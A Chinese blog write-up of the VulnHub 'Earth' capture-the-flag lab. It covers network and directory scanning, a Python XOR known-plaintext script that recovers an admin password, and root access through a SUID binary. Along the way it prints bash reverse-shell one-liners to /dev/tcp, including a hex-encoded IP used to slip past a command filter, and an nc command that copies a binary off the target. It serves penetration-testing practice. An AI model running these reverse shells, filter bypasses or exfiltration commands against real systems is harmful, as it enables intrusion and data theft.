【Vulnhub靶场】Earth

已于 2022-07-05 11:38:42 修改
阅读量962 收藏 2
点赞数 2
分类专栏: 靶场实战 文章标签: 信息收集 目录扫描 XOR解密 权限提升 反弹shell
于 2022-06-16 16:58:16 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_53095382/article/details/125318792
版权

前言

Difficulty: Easy

Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experience. There are two flags on the box: a user and root flag which include an md5 hash.

 难度:简单
地球是一个简单的盒子,尽管您可能会发现它比本系列中的“水星”更具挑战性,并且根据您的经验,在简单的更难的一面。盒子上有两个标志:一个用户标志和一个包含 md5 哈希的根标志。

下载链接:

https://download.vulnhub.com/theplanets/Earth.ova.torrent

一、信息收集

0x00 arp-scan扫描

arp-san -I eth1 -l  #指定网卡扫描

0x01 nmap扫描

nmap -A 192.168.56.101
发现有earth.local、terratest.earth.local两个DNS解析。

修改hosts文件确保能够正常访问

Windows位置:C:\Windows\System32\drivers\etc\hosts

linux位置:         /etc/hosts

windows:

kali:

http://earth.local
http://terratest.earth.local
两个页面一致
有三行数值

Previous Messages: 
37090b59030f11060b0a1b4e0000000000004312170a1b0b0e4107174f1a0b044e0a000202134e0a161d17040359061d43370f15030b10414e340e1c0a0f0b0b061d430e0059220f11124059261ae281ba124e14001c06411a110e00435542495f5e430a0715000306150b0b1c4e4b5242495f5e430c07150a1d4a410216010943e281b54e1c0101160606591b0143121a0b0a1a00094e1f1d010e412d180307050e1c17060f43150159210b144137161d054d41270d4f0710410010010b431507140a1d43001d5903010d064e18010a4307010c1d4e1708031c1c4e02124e1d0a0b13410f0a4f2b02131a11e281b61d43261c18010a43220f1716010d40
3714171e0b0a550a1859101d064b160a191a4b0908140d0e0d441c0d4b1611074318160814114b0a1d06170e1444010b0a0d441c104b150106104b1d011b100e59101d0205591314170e0b4a552a1f59071a16071d44130f041810550a05590555010a0d0c011609590d13430a171d170c0f0044160c1e150055011e100811430a59061417030d1117430910035506051611120b45
2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a

 

https://terratest.earth.local页面不一致

二、目录扫描

0x00 dirb扫描

earth.local扫描结果一样
terratest.earth.local多一个robots.txt

 

/testingnotes.*是文件,上边都是后缀,逐个尝试发现/testingnotes.txt

 

测试安全消息系统注意事项:
*使用 XOR 加密作为算法,在 RSA 中使用应该是安全的。
*地球已确认他们已收到我们发送的消息。
*testdata.txt 用于测试加密。
*terra 用作管理门户的用户名。
去做:
*我们如何安全地将我们的每月密钥发送到地球?还是我们应该每周更换密钥?
*需要测试不同的密钥长度以防止暴力破解。钥匙应该多长?
*需要改进消息界面和管理面板的界面,目前非常基础。
​
获取三个信息
1、XOR加密算法
2、testdata.txt文件
3、terra为用户名

testdata.txt文件内容

根据辐射测年估计和其他证据,地球形成于 45 亿年前。在地球历史的最初十亿年中,生命出现在海洋中并开始影响地球的大气和地表,导致厌氧生物和后来的需氧生物的扩散。一些地质证据表明,生命可能早在 41 亿年前就已经出现。

0x01 XOR解密

# -*- coding:utf-8 -*-
import binascii
​
str1 = "2402111b1a0705070a41000a431a000a0e0a0f04104601164d050f070c0f15540d1018000000000c0c06410f0901420e105c0d074d04181a01041c170d4f4c2c0c13000d430e0e1c0a0006410b420d074d55404645031b18040a03074d181104111b410f000a4c41335d1c1d040f4e070d04521201111f1d4d031d090f010e00471c07001647481a0b412b1217151a531b4304001e151b171a4441020e030741054418100c130b1745081c541c0b0949020211040d1b410f090142030153091b4d150153040714110b174c2c0c13000d441b410f13080d12145c0d0708410f1d014101011a050d0a084d540906090507090242150b141c1d08411e010a0d1b120d110d1d040e1a450c0e410f090407130b5601164d00001749411e151c061e454d0011170c0a080d470a1006055a010600124053360e1f1148040906010e130c00090d4e02130b05015a0b104d0800170c0213000d104c1d050000450f01070b47080318445c090308410f010c12171a48021f49080006091a48001d47514c50445601190108011d451817151a104c080a0e5a"
​
testdata = "According to radiometric dating estimation and other evidence, Earth formed over 4.5 billion years ago. Within the first billion years of Earth's history, life appeared in the oceans and began to affect Earth's atmosphere and surface, leading to the proliferation of anaerobic and, later, aerobic organisms. Some geological evidence indicates that life may have arisen as early as 4.1 billion years ago."
​
#先将testdata文本编码,然后再将字符串转换成十六进制,为什么呢,因为XOR异或运算是十六进制运算符
​
testdata = binascii.b2a_hex(testdata.encode("utf-8"))
​
# int(str1, 16)指明str1是十六进制整数值,hex()
#将括号里的十进制数值转化为十六进制(XOR运算之后的数值是十进制·········)。
​
result = hex(int(str1, 16) ^ int(testdata, 16))
​
print(result)

0x6561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174656368616e67656261643468756d616e736561727468636c696d6174
去掉0x转化为字符串

转换地址:https://www.toolscat.com/decode/hex

用户名:            terra

密码:     earthclimatechangebad4humans

目录扫描有登录框,直接登录。

三、漏洞利用

0x00 命令执行漏洞

 0x01 反弹shell绕过

可以考虑写反弹shell

bash -i >& /dev/tcp/192.168.56.101/9001 0>&1  
bash -i >& /dev/tcp/MTkyLjE2OC41Ni4xMDEvOTAwMQ== 0>&1
#没有反应,查看攻略是被过滤掉了,用十六进制

bash -i >& /dev/tcp/0xc0.0xa8.0x38.0x66/9001 0>&1
#反弹成功

sudo -l #发现没有权限

四、权限提升

寻找可执行权限最高的文件,root比较可疑,运行一下试试看

find / -perm -u=s -type f 2>/dev/null
find / -perm /u=s -type f 2>/dev/null
-perm 按权限查找 ugo(用户/组/其他) rwx(读/写/执行) 
S 为SUID/SGID特殊权限
-type 文件类型f->文件  d->文件夹
2>/dev/null 不显示错误信息 2->错误输出(0->标准输入; 1->标准输出) >(先清除再写入) or >>(追加) /dev/null位桶(黑洞),接受到的任何数据都会被丢弃

0x00 strace安装 

apt-get install atrace
sudo apt-get instasll strace  权限不够用sudo

0x01 文件利用

靶机:nc 192.168.56.102 7777 </usr/bin/reset_root

kali监听:nc -lvvp 7777>reset_root

已接收到reset_root

在shell靶机上创建三个文件

bash-5.1$ touch /dev/shm/kHgTFI5G
touch /dev/shm/kHgTFI5G
bash-5.1$ touch /dev/shm/Zw7bV9U5
touch /dev/shm/Zw7bV9U5
bash-5.1$ touch /tmp/kcM0Wewe
touch /tmp/kcM0Wewe

然后运行,拿到root密码

切换用户,获得root权限

flag

 

Ch33syNai1a0
关注
专栏目录
xorcrypt:异或加密解密算法
06-18
异或加密 Usage import xorcrypt print xorcrypt.encrypt("abc", 2) # 'kde' print xorcrypt.decrypt("kde", 2) # 'abc' API encrypt(s, key, M1, IA1, IC1) s => str M1, IA1, IC1 => uint32, 加密因子: 数据传输两端协商,固定 key => 加密key: 一般又服务器端发给客户端 其实encrypt和decrypt是同一函数 c语言代码 // XOR RSA 加密/解密算法 -- 加密解密为同一函数(xor_crypt) // M1 IA1 IC1 是加密因子,即公钥: 服务端和客户端协商好固定 const unsigned int M1 = 1 << 19; const unsigned int IA1 = 2 << 20; c
渗透测试学习之日常打靶THE PLANETS: EARTH
yc11223344的博客
07-21 1702
靶机名称Earth
Earth靶场练习
最新发布
weixin_69602647的博客
08-02 221
earth靶场练习
渗透测试学习之靶机THE PLANETS: EARTH
xdbzdgx的博客
05-05 1780
前期准备 1.下载靶机The Planets: Earth ~ VulnHub 1.载入vmware,网络模式设置为NAT kali IP地址为192.168.88.128 靶机 IP地址为192.168.88.131 一 、信息收集 1.使用nnamp扫描器扫描开放的端口 nmap -T4 -sV -p- -A 192.168.88.131 发现开放了22,80,443端口,且443端口需要设置DNS解析。 没设置DNS解析时,我们尝试访问下,可以看到,状态是400
Vulnhub-THE PLANETS: EARTH
豆傻小饼干随记
11-14 3122
原文:http://www.valesec.top/archives/theplanetsearth THE PLANETS: EARTH 靶机描述 Difficulty: Easy ​ Earth is an easy box though you will likely find it more challenging than "Mercury" in this series and on the harder side of easy, depending on your experi...
vulnhub靶场The Planets Earth教程
m0_73248913的博客
01-20 416
可以发现触发条件是/dev/shm/kHgTFI5G、/dev/shm/Zw7bV9U5、/tmp/kcM0Wewe存在(后来尝试发现是需要三个文件都存在)在靶机上用touch命令创建这三个文件,创建完成后再执行/usr/bin/reset_root,执行成功,显示root的密码被修改成了Earth。从/usr/bin/reset_root执行失败的返回信息来看,是需要触发条件的,直接执行的话,触发条件都不满足。靶机上将/usr/bin/reset_root文件的内容通过nc重定向到攻击机的2222端口。
Vulnhub靶场题解
08-24
Vulnhub是一个专门提供给安全爱好者和渗透测试人员进行实践和学习的安全靶场平台。它的特色在于提供了各种带有预设漏洞的虚拟机镜像文件,这允许用户在模拟的环境中进行渗透测试和安全攻防演练。通过使用这些虚拟机...
vulnhub靶场库中 DC:1
07-06
1. **Vulnhub靶场库与DC:1介绍** Vulnhub是一个在线资源库,提供了一系列虚拟机镜像,这些镜像设计为安全学习和实践平台,尤其是对于网络安全初学者。DC:1是Vulnhub靶场库中的一个特定靶机,它旨在帮助用户学习和...
Vulnhub靶场题解.html
08-12
Vulnhub靶场题解.,适合渗透测试人员学习交流
VulnHub靶场MONEYBOX:1
01-05
VulnHub是一个提供各种漏洞环境的靶场平台,供安全爱好者学习渗透测试使用。MONEYBOX:1是VulnHub上的一个靶场环境,提供了虚拟机镜像,可以在本地安装并尝试完成渗透测试任务。这个靶场类似于一个游戏,需要逐步完成...
VulnHub20230718最新全部靶场详情 - 共701个靶场信息
07-18
由于本人最近打靶,但是【VulnHub】网站访问总是有些显示问题,靶场信息查找也很不方便,所以本人总结了【VulnHub】上面所有靶场的全部基本信息,方便各位按照自己需求进行搜索查看
靶机渗透练习84-The Planets:Earth
hirak0的博客
04-27 2458
靶机描述 靶机地址:https://www.vulnhub.com/entry/the-planets-earth,755/ Description Difficulty: Easy Earth is an easy box though you will likely find it more challenging than “Mercury” in this series and on the harder side of easy, depending on your experience.
2-vulnhub靶场Earth
qq_49078152的博客
08-14 1685
vulnhub,earth靶机练习
The Planets:Earth
weixin_44770698的博客
01-11 1011
靶场练习
Vulnhub系列靶机-The Planets Earth
来日可期的博客
10-09 575
到这里我们知道,加密算法是XOR,用户名是terra,并且还有一个testdata.txt用于测试加密。查看是否有flag文件,发现一个/var/earth_web/user_flag.txt。使用strace工具检测reset_root文件的运行过程,如果没有可以进行下载。爆破出来了/admin/login目录,浏览器中访问一下,发现是一个登录页面。是要发送的文件名或路径。你可以在接收端的文件系统中找到该文件,并对其进行进一步处理。对reset_root进行调试,给reset_root文件赋予执行权限。
vulnhub靶场——THE PLANETS:EARTH
weixin_61951055的博客
11-19 1017
靶机渗透练习-The Planets:Earth
VulnHub | The-Planets:Earth
薛定的餓貓
12-10 4024
The Planets: Earth 目录The Planets: Earth项目地址测试环境信息收集漏洞利用权限提升 项目地址 http://www.vulnhub.com/entry/the-planets-earth,755/ 难度:Easy 测试环境 攻击机:Kali 192.168.56.111 目标靶机:Fedora 192.168.56.110 信息收集 打开目标靶机,使用arp-scan -I eth1 -l指定网卡并扫描局域网内存活机器IP,使用nmap扫描开启了什么端口,然后使用-sV参
vulnhub刷题记录(The Planets: Earth
ailx10
08-20 1676
英文名称:The Planets: Earth中文名称:行星:地球发布日期:2021 年 11 月 2 日难度:简单描述:地球是一个简单的盒子,尽管您可能会发现它比本系列中的“水星”更具挑战性,并且根据您的经验,在简单的更难的一面。盒子上有两个标志:一个用户标志和一个包含 md5 哈希的根标志。这已经在 VirtualBox 上进行了测试,因此在 VMware 上可能无法正常工作。如有任何问题/问...
渗透实战-vulnhub-The Plants:Earth
qq_52263650的博客
03-10 216
渗透实战-vulnhub-The Plants:Earth
vulnhub靶场通关
09-09
vulnhub靶场是一个用于学习和测试网络安全技能的平台。通关vulnhub靶场需要进行一系列的渗透测试和漏洞利用操作。根据引用中提供的目录,以下是一个通关vulnhub靶场的大致步骤: 1. 环境搭建:下载靶场环境,并启动靶场环境。 2. 信息收集:通过探测靶机真实IP和开放的端口及服务进行信息收集。 3. 访问web站点:访问web站点并进行网站的扫描和漏洞探测。 4. 利用漏洞:使用Metasploit框架(MSF)进行漏洞利用。 - 使用MSF命令进行简单命令介绍和搜索Drupal 7的漏洞。 - 在MSF控制台中搜索drupal模块,并选择合适的模块进行测试。 - 设置靶机IP并运行相应的漏洞利用模块。 - 获取反弹shell或执行命令,并查找flag文件。 5. 登录站点:使用获取到的凭证登录站点并进一步探索和查找flag文件。 请注意,以上步骤仅提供了通关vulnhub靶场的大致思路,具体操作和漏洞利用可能因不同的靶场环境而有所不同。因此,确保在进行任何渗透测试操作之前,遵守法律和道德准则,并获得合法的授权。
评论 1
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包

打赏作者

Ch33syNai1a0

你的鼓励将是我创作的最大动力

¥1 ¥2 ¥4 ¥6 ¥10 ¥20
扫码支付:¥1
获取中
扫码支付

您的余额不足,请更换扫码支付或充值

打赏作者

实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值